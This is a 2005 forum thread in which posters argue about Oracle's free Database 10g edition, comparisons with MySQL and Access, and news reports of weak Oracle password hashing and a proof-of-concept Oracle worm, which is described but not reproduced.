Oracle Database 10g given away for free

Discussion in 'NZ Computing' started by, Nov 3, 2005.

  1., Nov 3, 2005
    1. Advertisements


    Shane Guest

    This was publiished on the 28th of last month
    A research paper released this week spells out weaknesses in the password mechanism
    for Oracle databases and describes how to break system passwords in

    A number of decisions made by the database maker weakens the password
    algorithm, according to Joshua Wright of the SANS Institute and Carlos Cid
    of the University of London. Passwords in Oracle databases use the account
    name to randomize the password hashing process, converts all characters to
    uppercase letters and uses a fairly weak hashing algorithm, the two
    researchers said in the paper.

    and this is the pdf detailing the above vulnerability

    this was published 02/11 (presumably this morning our time)
    An Oracle worm posted to the Full-disclosure mailing list on Monday may be
    harmless now, but with the source code available it may not stay that way.

    The worm scans local subnets looking for other database servers, and then tries
    various common username and password combinations. If this succeeds, a
    table 'x' is placed on the server and the cycle is repeated. With the
    source code in the wild, it is trivial to change this table creation to
    something less benign.

    Oracle has been criticized in the past for its lax response to security
    issues, and given the company’s prior slogan of being "Unbreakable" this
    worm shows the importance of acting swiftly on vulnerabilities, before
    they become widespread problems.

    The source code to the worm can be found here

    Shane, Nov 3, 2005
    1. Advertisements

  3. Interesting, but I'm not sure how this relates to Oracle giving away it's
    software for free?
, Nov 3, 2005

    thingy Guest

    Not sure if it is brilliant or desperate....Oracle bought some software
    "critical" to Mysql, which is generally seen as a move to curtail
    mysql's growing market share.

    GPL (or similar licence) databases are MS and Linux the
    next battleground becomes the applications on top of the OS, databases
    are expensive and are a prime candidate for the good enough market.

    Oracle charges silly amounts for its software, something like $40k per
    cpu, ditto MS's SQL.

    Mysql on the other hand and a few others are free or just about free and
    you can buy support if needed and will do 50%+ of what most databases
    are used for.

    It will be interesting to watch........


    thingy, Nov 3, 2005

    Not Dave Guest

    LOL!!! That's really funny!!!

    Mentioning MySQL and Oracle in the same breath shows a complete lack
    of understanding of database technology.
    Not Dave, Nov 3, 2005

    Not Dave Guest

    Shane understands that commercial companies giving away solid,
    commercial software renders open source irrelevant, and are therefore
    a threat.

    Those that are not prepared to pay for quality commercial software no
    longer have to turn to the products made by hobbyists in their spare

    Well done Oracle, I say.
    Not Dave, Nov 3, 2005

    Chris Hope Guest

    You think MySQL is made by hobbyists? Sure, it may not be in the same
    league as Oracle, but it's a commercial company who pays their
    developers to develop their open source database products.

    It is quite interesting that Oracle is doing this though. However, you
    can only use the free version on smaller databases (4GB of user data in
    total) but still very interesting.
    Chris Hope, Nov 3, 2005

    Not Dave Guest

    I wasn't talking about MySQL specifically in that comment, although
    re-reading it I can see how it could be interpreted that way with my
    comment elsewhere regarding comparing mySQL and Oracle, which is a bit
    of a joke. I was more commenting in general - some posters here appear
    to be very against commercial software being free, as it erodes what
    htey see as the competitive advantage of open source software - ie
    that it is free (as in beer).

    MySQL is a great, fast, lite little DBMS. Better yet, it's free in
    many situations. Oracle is the holy grail high-end enterprise-level
    and above DBMS. Both are good, and both definately have their place.
    However, there is no place for comparisons between the two.
    A very interesting move. I wonder if Microsoft will make Access free
    in response? Which, of course, is about what it's worth, but that's a
    different thread... ;-)
    Not Dave, Nov 3, 2005

    Shane Guest

    I _think_ that the very same day that Oracle announce their software
    giveaway, is the day Oracle makes it to Security focus' frontpage because
    someone (in their omnipotent wisdom) has released source code for a
    working worm
    As can _clearly_ be seen by the articles I quoted from, all that is
    required for the worm to become malicious is to change the payload, so
    instead of making table x, shellcode (for example) is inserted

    The _smart_ thing to do is to wait a few days for Oracle to respond to the
    flaws reported, and to patch them accordingly, or declare the 10g
    And _then_ download the products (saving a possible double-up)

    I do like how you turn a "heads up" into something personal though HOG, I
    have to say it really does show the strength(or lack there of) of your
    Is this because youre a complete moron?

    You really have to wonder about some people
    Shane, Nov 3, 2005

    Shane Guest

    I think the implications speak for themselves, wait a week or two to see
    if the free products are affected ... then download
    Shane, Nov 3, 2005
  11. Well I don't really care. They will patch this eventually I would suppose.
    Just like microsoft.

    Surely if your machine is firewalled and you are only using this within the
    'intranet' then there is no problem right?
, Nov 3, 2005

    Not Dave Guest

    It is simply a worm that "scans for common username/password
    combinations". That's not a vulnerability, that's a slack DBA.
    No, you posted those links in an attempt to discredit Oracle. Nice
    attempt at a backtrack, though.
    That's not the first time you've called me "HOG". Google Groups just
    told me WTF you are on about, and I see that a while ago another
    poster by the name of "HOG" also disagreed with you. I guess in your
    black and white world that makes us the same person. Quite comical,
    actually, and kind of proves my point.

    For the record, however, I am not "HOG".
    Hmm, personal abuse. Why don't you show the strength(or lack there of)
    of my argument(s) by actually addressing them for a change, rather
    than resorting to your usual abuse?
    That you do.
    Not Dave, Nov 3, 2005
  13. He he if you want to run 500 million dollars in annual sales through MySQL
    then go for it.
, Nov 3, 2005

    Shane Guest

    Did you perchance see the *other* vulnerability?
    Yes, the one where the system users password is considered *extremely*
    I beg your pardon, I posted those links as a heads up, nice try at putting
    words into my mouth...again
    Funny how you present your arguments *precisely* as he did
    er.. you saying you werent engaging in personal abuse.. nice retract

    Shall I actually address them by calling people commies?
    Or should I go quiet when asked to back up my comments?
    Shane, Nov 3, 2005

    Not Dave Guest

    Whatever. Someone said "Look, Oracle's giving something away for
    free". You, probably not even knowing who Oracle are, replied with
    "Yea, but look!! Vulnerabilities!!". [Verbatim].
    Sounds like an intelligent fellow.
    Really, though, Shane, you are inconsequential. If you want to call me
    hog, go right ahead. All it does is make you look like an idiot, since
    I'm obviously not him.
    I stated an opinion. Rather than addressing and debating that opinion,
    *you* resorted to abuse. As usual.
    Yes, you are right. I get bored sometimes trying to discuss things
    with idiots and trolls who don't understand that people can have
    opposing views, and sometimes just walk away.

    Prime example:

    This at the end of a thread when I have responded to posts you have
    made that have really illustrated your black and white mind set by
    pointing it out to you, only to be told to spend _my_ time coming up
    with these examples - that I have directly pointed out each time!! And
    in the same post you ask why I haven't given up in frustration and
    walked away! And now you're making comments on the fact I did just
    that!!!! Get with the programme, boy.

    Bye, now.
    Not Dave, Nov 3, 2005

    Shane Guest

    Ooo look, snipped away the other links, the ones where you cant show a
    single *instance* of your claims

    Ah look, I posted factual goings on related directly to the OP to which
    *you* respond

    How is this _not_ a personal attack, how is this even remotely rebutting
    my post, how is this intelligent?
    In fact, this shows you *think* everything is an attack on your precious
    *commercial companies*
    You really have to grow up boy, this is the big bad world, mums not here
    to look after you, and when theres an alert posted on security focus the
    very same day Oracle releases a product, the _smart_ people wait for it
    to a) patched, or b)declared unaffected
    ps who funds Securityfocus?.. symantec ring any bell?.. nah cant be..
    theyre a commercial organisation

    Heres the funny thing, only 4 days ago I was posting about phpbb being a
    security nightmare
    Gosh.. does that mean Im anti OSS??????

    Youre pathetic "Not Dave", and your little war is doing nothing
    In fact..heres the best way to see the end of it
    Shane, Nov 3, 2005

    Steven H Guest

    Hello Not,
    msde (much better than access) is free and imsvho better than that primitave
    version of mySQL that i played with, although i would say that - having sold
    my soul to microsoft and all that ...

    the only good thing about mySQL is its shit-easy to install, copy the executable
    - msde (cut up version of sqls) involves an installer
    now now.. be nice..

    i have seen some highly polished programs done in access, of course the first
    thing i said when i saw them was 'will i be converting this to .net' but
    that is beside the point.

    to thoes intrested the answer to my question was 'definately no'
    Steven H, Nov 3, 2005

    Shane Guest

    Yeah eventually.. with something like this you'd hope sooner rather than

    The 'ideal' testing situation would have to be a standalone machine,
    with no network connections, the next step up would be a machine behind
    another machine acting as a firewall, and limiting outbound as well as

    Definitely for testing purposes have a good look at it, just keep in mind
    all the 'gotchas' should you like it and want to take it to production
    Shane, Nov 3, 2005

    Not Dave Guest

    Not Dave, Nov 3, 2005

    Not Dave Guest

    True, actually.
    Actually, the best thing about mySQL is that it a very lite and fast
    DBMS designed to work on pretty average hardware. It lacks anything
    resembling an "advanced" function, but is perfect for web stuff (small
    to medium sites).

    Obviously it's nowhere near the same league as Oracle, or even MSSQL.
    See, I don't think Access is a suitable basis for commercial software,
    and hence I have a hard time giving a good rating to software
    utilising it. Just my opinion, of course, but it is somewhat, um,
    Not Dave, Nov 3, 2005
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.